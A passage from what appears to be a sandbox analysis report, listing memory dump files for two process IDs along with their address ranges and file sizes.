                              4.7MB

                            • memory/2804-82-0x0000000000920000-0x0000000000DD2000-memory.dmp

                              Filesize

                              4.7MB

                            • memory/2804-98-0x0000000006EB0000-0x00000000078C1000-memory.dmp

                              Filesize

                              10.1MB

                            • memory/2804-139-0x0000000006EB0000-0x00000000078C1000-memory.dmp

                              Filesize

                              10.1MB

                            • memory/3052-240-0x0000000002810000-0x0000000002818000-memory.dmp

                              Filesize

                              32KB

                            • memory/3052-239-0x000000001B620000-0x000000001B902000-memory.dmp

                              Filesize

                              2.9MB